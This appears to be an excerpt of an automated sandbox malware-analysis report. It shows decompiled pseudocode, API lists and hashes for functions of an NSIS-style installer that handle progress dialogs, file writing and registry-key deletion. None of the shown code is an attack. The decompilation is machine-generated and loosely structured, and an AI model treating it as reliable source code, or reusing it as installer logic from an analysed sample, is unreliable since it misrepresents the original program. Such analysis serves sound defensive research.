                                                              0x004053e3
                                                              0x004053e7
                                                              0x004053ea
                                                              0x004053fd
                                                              0x0040540b
                                                              0x0040540b
                                                              0x0040540f
                                                              0x00405411
                                                              0x00405414
                                                              0x00000000
                                                              0x00405414
                                                              0x00405395
                                                              0x0040539d
                                                              0x004053a5
                                                              0x004053ab
                                                              0x00000000
                                                              0x004053ab
                                                              0x004053a5
                                                              0x00405393
                                                              0x0040541e

                                                              APIs
                                                              • lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                              • lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                              • lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                              • SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                              • SendMessageA.USER32 ref: 004053E3
                                                              • SendMessageA.USER32 ref: 004053FD
                                                              • SendMessageA.USER32 ref: 0040540B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 2531174081-0
                                                              • Opcode ID: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                                              • Instruction ID: d7aab4fbb83e072b647ad5d9ecd44a72e262910ab30c50883f082c619406a612
                                                              • Opcode Fuzzy Hash: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
                                                              • Instruction Fuzzy Hash: 54218171900118BBDB11AF95DD84ADEBFB9EF04354F14807AF944B6291C7788E918F98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41f904; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41f904 = 0;
					return _t15;
				}
				__eflags =  *0x41f904; // 0x0
				if(__eflags != 0) {
					return E0040666D(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x424750;
				if(_t6 >  *0x424750) {
					__eflags =  *0x424748;
					if( *0x424748 == 0) {
						_t7 = CreateDialogParamA( *0x424740, 0x6f, 0, E00402DBA, 0);
						 *0x41f904 = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424814 & 0x00000001;
					if(( *0x424814 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E0040534F(0,  &_v68);
					}
				}
				return _t6;
			}







                                                              0x00402e5e
                                                              0x00402e60
                                                              0x00402e67
                                                              0x00402e6a
                                                              0x00402e6a
                                                              0x00402e70
                                                              0x00000000
                                                              0x00402e70
                                                              0x00402e78
                                                              0x00402e7e
                                                              0x00000000
                                                              0x00402e81
                                                              0x00402e88
                                                              0x00402e8e
                                                              0x00402e94
                                                              0x00402e96
                                                              0x00402e9c
                                                              0x00402eda
                                                              0x00402ee3
                                                              0x00000000
                                                              0x00402ee8
                                                              0x00402e9e
                                                              0x00402ea5
                                                              0x00402eb6
                                                              0x00000000
                                                              0x00402ec4
                                                              0x00402ea5
                                                              0x00402ef0

                                                              APIs
                                                              • DestroyWindow.USER32 ref: 00402E6A
                                                              • GetTickCount.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040306B), ref: 00402E88
                                                              • wsprintfA.USER32 ref: 00402EB6
                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B
                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                • Part of subcall function 00402E36: MulDiv.KERNEL32 ref: 00402E4B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                              • String ID: ... %d%%
                                                              • API String ID: 722711167-2449383134
                                                              • Opcode ID: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                                              • Instruction ID: 7a453c914e71352c87dd6fc4fa143b29ed4b83a6d55c3b122a6f25389f326a81
                                                              • Opcode Fuzzy Hash: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
                                                              • Instruction Fuzzy Hash: 22018470582214E7CB61AB64EF0DAAF766CEB41745B14403BF801F21E0C7B95846CAEE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00404BFF, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00404BFF(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                              0x00404c0d
                                                              0x00404c1a
                                                              0x00404c20
                                                              0x00404c5e
                                                              0x00404c5e
                                                              0x00404c6d
                                                              0x00404c74
                                                              0x00000000
                                                              0x00404c76
                                                              0x00404c22
                                                              0x00404c31
                                                              0x00404c39
                                                              0x00404c3c
                                                              0x00404c4e
                                                              0x00404c54
                                                              0x00404c5b
                                                              0x00000000
                                                              0x00404c5b
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                              • Instruction ID: 8affecd5b479f1171f5654815cc51d63bffccf6ae5a63c5c4c29235a80b14989
                                                              • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                              • Instruction Fuzzy Hash: 34015E71900219BBEB00DBA4DD85FFFBBBCAF55711F10012BBA50B61D0D7B4A9418BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x424754 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                              0x00402dc7
                                                              0x00402dd5
                                                              0x00402ddb
                                                              0x00402ddb
                                                              0x00402de9
                                                              0x00402deb
                                                              0x00402df7
                                                              0x00402dfc
                                                              0x00402dfe
                                                              0x00402dfe
                                                              0x00402e09
                                                              0x00402e19
                                                              0x00402e2b
                                                              0x00402e2b
                                                              0x00402e33

                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                              • wsprintfA.USER32 ref: 00402E09
                                                              • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E2B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                              • API String ID: 1451636040-1158693248
                                                              • Opcode ID: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                                              • Instruction ID: 5924424b8475f9adf48b5715c1e1f77af8692632bd00ddb5f136e7bd4fbbb8aa
                                                              • Opcode Fuzzy Hash: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                                              • Instruction Fuzzy Hash: 36F01D7154020DFBEF20AF60DE0ABAE3769EB54345F00803AFA16B51D0DBB899558B99
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C2D(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405D9C(_t50);
				_t26 = E00405DC1(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x424758;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403419(_t45);
						E00403403(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E00403192(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405D7C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E68( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E00403192(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                              0x004027df
                                                              0x004027e1
                                                              0x004027ed
                                                              0x004027f0
                                                              0x004027fa
                                                              0x004027fe
                                                              0x004027fe
                                                              0x00402804
                                                              0x00402811
                                                              0x00402819
                                                              0x0040281c
                                                              0x00402822
                                                              0x00402830
                                                              0x00402835
                                                              0x00402839
                                                              0x0040283c
                                                              0x00402845
                                                              0x00402851
                                                              0x00402855
                                                              0x00402858
                                                              0x00402862
                                                              0x00402887
                                                              0x00402869
                                                              0x0040286e
                                                              0x00402876
                                                              0x0040287c
                                                              0x00402881
                                                              0x00402881
                                                              0x0040288e
                                                              0x0040288e
                                                              0x0040289b
                                                              0x004028a1
                                                              0x004028b3
                                                              0x004028b3
                                                              0x004028b9
                                                              0x004028b9
                                                              0x004028c4
                                                              0x004028c5
                                                              0x004028c9
                                                              0x004028cd
                                                              0x004028d3
                                                              0x004028d3
                                                              0x004028da
                                                              0x004022dd
                                                              0x00402a5d
                                                              0x00402a69

                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                              • GlobalFree.KERNEL32(?), ref: 0040288E
                                                              • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                              • CloseHandle.KERNEL32(?), ref: 004028B9
                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                                              • Instruction ID: d0efecf462ec4b8749248d5ce184abccdfd1d8ac98bc27b14fb78a8abc9ee6f4
                                                              • Opcode Fuzzy Hash: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                                              • Instruction Fuzzy Hash: A5217C72800128BBDB216FA5CE48D9E7E79EF09364F10823EF461762E1C67949418BA8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00404AF5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00404AF5(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062BB(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062BB(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062BB(_t41, _t47, 0x420d50, 0x420d50, _a8);
				wsprintfA(_t32 + lstrlenA(0x420d50), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423f18, _a4, 0x420d50);
			}



















                                                              0x00404afb
                                                              0x00404b00
                                                              0x00404b08
                                                              0x00404b09
                                                              0x00404b16
                                                              0x00404b1e
                                                              0x00404b1f
                                                              0x00404b21
                                                              0x00404b23
                                                              0x00404b25
                                                              0x00404b28
                                                              0x00404b28
                                                              0x00404b2f
                                                              0x00404b35
                                                              0x00404b35
                                                              0x00404b3c
                                                              0x00404b43
                                                              0x00404b46
                                                              0x00404b49
                                                              0x00404b49
                                                              0x00404b4d
                                                              0x00404b5d
                                                              0x00404b5f
                                                              0x00404b62
                                                              0x00404b0b
                                                              0x00404b0b
                                                              0x00404b12
                                                              0x00404b12
                                                              0x00404b6a
                                                              0x00404b75
                                                              0x00404b8b
                                                              0x00404b9b
                                                              0x00404bb7

                                                              APIs
                                                              • lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                                              • wsprintfA.USER32 ref: 00404B9B
                                                              • SetDlgItemTextA.USER32(?,00420D50), ref: 00404BAE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s$PB
                                                              • API String ID: 3540041739-838025833
                                                              • Opcode ID: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                                              • Instruction ID: 5179c0f035392565bdab74c0efbe7b8420b5ea1509705373073e4f645d5961bf
                                                              • Opcode Fuzzy Hash: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                                              • Instruction Fuzzy Hash: 6011B773A0412437DB10656D9C45FAE329CDB85374F25023BFA26F31D1E978DC1282E9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 48%
                                                              			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060AE(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406631(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                              0x00402cdb
                                                              0x00402ce4
                                                              0x00402ced
                                                              0x00402cf9
                                                              0x00402d02
                                                              0x00402d0c
                                                              0x00402d31
                                                              0x00402d37
                                                              0x00402d3c
                                                              0x00402d3d
                                                              0x00402d6d
                                                              0x00402d46
                                                              0x00402d48
                                                              0x00402d98
                                                              0x00402d9b
                                                              0x00000000
                                                              0x00402da1
                                                              0x00402d57
                                                              0x00402d5c
                                                              0x00402d5e
                                                              0x00000000
                                                              0x00000000
                                                              0x00402d66
                                                              0x00402d6b
                                                              0x00402d6c
                                                              0x00402d6c
                                                              0x00402d79
                                                              0x00402d81
                                                              0x00402d88
                                                              0x00000000
                                                              0x00402db1
                                                              0x00000000
                                                              0x00402d90
                                                              0x00402d1c
                                                              0x00402d2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00402d2f
                                                              0x00402db7

                                                              APIs
                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CloseEnum$DeleteValue
                                                              • String ID:
                                                              • API String ID: 1354259210-0
                                                              • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                              • Instruction ID: 3131e3f6e31e27b0aa66d3651422ecf58d36830b066a5e7c74bd8b9791dc988a
                                                              • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                              • Instruction Fuzzy Hash: 21215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48F64AA68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x424740,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                              0x00401d65
                                                              0x00401d69
                                                              0x00401d7e
                                                              0x00401d6b
                                                              0x00401d6d
                                                              0x00401d73
                                                              0x00401d73
                                                              0x00401d84
                                                              0x00401d87
                                                              0x00401d91
                                                              0x00401d94
                                                              0x00401d9c
                                                              0x00401dad
                                                              0x00401db0
                                                              0x00401dbb
                                                              0x00401db2
                                                              0x00401db4
                                                              0x00401db4
                                                              0x00401dbf
                                                              0x00401dcc
                                                              0x00401df3
                                                              0x00401e02
                                                              0x00401e10
                                                              0x00401e18
                                                              0x00401e20
                                                              0x00401e20
                                                              0x00401e29
                                                              0x00401e2f
                                                              0x004029a5
                                                              0x004029a5
                                                              0x00402a5d
                                                              0x00402a69

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
